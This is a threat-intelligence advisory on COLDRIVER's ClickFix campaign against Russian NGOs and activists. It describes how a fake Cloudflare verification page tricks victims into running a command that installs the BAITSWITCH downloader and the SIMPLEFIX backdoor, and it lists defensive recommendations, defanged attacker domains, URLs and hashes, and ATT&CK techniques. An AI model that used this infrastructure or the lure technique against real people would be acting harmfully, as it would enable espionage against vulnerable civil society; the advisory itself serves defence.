COLDRIVER’s ClickFix Campaign Targets Civil Voices

COLDRIVER ClickFix Campaign Targets Russian Civil Society

Summary

In September 2025, researchers identified a new ClickFix campaign orchestrated by COLDRIVER (aka Nahr el Bared, Seaborgium, BlueCharlie, Star Blizzard, TA446, UNC4057). This campaign specifically targets Russian civil society, NGOs, activists, and think tanks, leveraging social engineering and malicious command execution to gain remote access.

The attack employs a fake Cloudflare Turnstile verification to trick victims into copying and executing a malicious command, which triggers the BAITSWITCH downloader. BAITSWITCH then delivers the SIMPLEFIX PowerShell backdoor, granting attackers persistent remote control. This operation reflects COLDRIVER’s focus on espionage and dissident surveillance, showing that even lightweight malware can be highly effective when paired with psychological manipulation.

Attack Details

The attack chain follows a multi-stage infection process:

• Initial Access: Victims are lured to websites mimicking civil society resources. A fake security check (ClickFix method) prompts users to run a malicious command in Windows Run dialog.

• BAITSWITCH Downloader:

  • Delivered via rundll32.exe, establishes persistence.

  • Contacts attacker-controlled domain, fetches instructions, and downloads SIMPLEFIX.

  • Executes commands via CreateProcessA, providing attackers with a foothold.

• SIMPLEFIX Backdoor:

  • Loaded via obfuscated Base64 and AES-encrypted payloads stored in registry keys.

  • Maintains persistence, dynamically generates user-agent strings, and sends periodic C2 beacons every three minutes.

• Attribution: Linked to COLDRIVER based on infrastructure overlaps, TTP similarities, and victimology, aligning with previous campaigns against NGOs and exiled activists.

Recommendations

• Be Cautious of Clipboard Prompts: Treat any website that asks you to copy and run commands in the Run dialog as malicious.

• Limit Privileges: Enforce least privilege principles, restricting administrative rights to minimize potential impact.

• Browser Isolation: Use cloud-based or sandboxed browsing environments to contain malicious code.

• Patch Regularly: Keep operating systems, browsers, and security tools fully updated to reduce exploitability.

• Deploy EDR & NGAV: Implement solutions that leverage behavioral analysis and machine learning to detect and block malware like BAITSWITCH and SIMPLEFIX.

Indicators of Compromise (IoCs)

Domains

• preentootmist[.]org

• blintepeeste[.]org

• captchanom[.]top

• southprovesolutions[.]com

URLs (Samples)

• hxxps[:]//preentootmist[.]org/?uinfo_message=Resilient_Voices

• hxxps[:]//captchanom[.]top/check/machinerie[.]dll

• hxxps[:]//southprovesolutions[.]com/VUkXugsYgu

• hxxps[:]//drive[.]google[.]com/file/d/1UiiDBT33N7unppa4UMS4NY2oOJCM-96T/view

SHA256 Hashes

• 87138f63974a8ccbbf5840c31165f1a4bf92a954bacccfbf1e7e5525d750aa48

• 62ab5a28801d2d7d607e591b7b2a1e9ae0bfc83f9ceda8a998e5e397b58623a0

• 16a79e36d9b371d1557310cb28d412207827db2759d795f4d8e27d5f5afaf63f

Email

• narnobudaeva[@]gmail[.]com

MITRE ATT&CK TTPs

• Resource Development: T1583 (Acquire Infrastructure), T1583.001 (Domains), T1585 (Establish Accounts), T1587 (Develop Capabilities), T1608 (Stage Capabilities)

• Initial Access: T1566 (Phishing), T1204.004 (Malicious Copy & Paste)

• Execution: T1059 (Command & Scripting Interpreter), T1059.001 (PowerShell), T1059.003 (Windows Command Shell), T1218.011 (Rundll32)

• Persistence: T1037.001 (Logon Script), T1112 (Modify Registry)

• Defense Evasion: T1027.011 (Fileless Storage), T1564.003 (Hidden Window)

• Discovery: T1082 (System Information Discovery), T1087.001 (Local Account Discovery)

• Collection & Exfiltration: T1005 (Data from Local System), T1041 (Exfiltration Over C2 Channel)

• Command & Control: T1071.001 (Web Protocols), T1573.002 (Asymmetric Cryptography)

References

• Zscaler – COLDRIVER Updates Arsenal with BAITSWITCH and SIMPLEFIX

• Hive Pro – COLDRIVER Creeps Closer with LostKeys Malware

• MITRE ATT&CK Techniques